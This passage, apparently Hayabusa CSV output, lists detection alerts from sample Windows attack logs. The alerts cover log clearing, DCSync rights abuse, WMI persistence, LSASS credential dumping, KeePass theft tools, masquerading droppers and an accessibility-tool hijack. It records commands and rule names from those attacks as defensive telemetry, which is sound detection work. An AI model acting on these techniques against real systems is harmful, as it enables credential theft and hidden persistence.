+09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: 
C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.155 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.205 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe 
/debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:21:48.323 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,System log file was cleared,User: user01,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx +2019-03-20 08:35:07.524 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx 
+2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx +2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\user01\Desktop\WMIGhost.exe"" : Path: C:\Users\user01\Desktop\WMIGhost.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Suspicious Scripting in a WMI Consumer,,rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\scrcons.exe -Embedding : Path: C:\Windows\System32\wbem\scrcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,high,WMI Persistence - Script Event Consumer,,rules/sigma/process_creation/win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: 
C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:44.045 +09:00,IEWIN7,1,informational,Process Creation,"Command: sysmon -c sysmonconfig-18-apr-2019.xml : Path: C:\Users\IEUser\Desktop\Sysmon.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: Powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Whoami 
Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1088,technique_name=Bypass User Account Control : Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Whoami 
Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Users\IEUser\Downloads\Flash_update.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" : Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe : User: IEWIN7\IEUser : Parent 
Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.931 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: cmd.exe /A : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: 
technique_id=T1036,technique_name=Masquerading : Command: KeeFarce.exe : Path: C:\Users\Public\KeeFarce.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx +2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,System log file was cleared,User: jwrig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-29 01:29:42.988 +09:00,IEWIN7,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx +2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx +2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Malicious Named 
Pipe,,rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 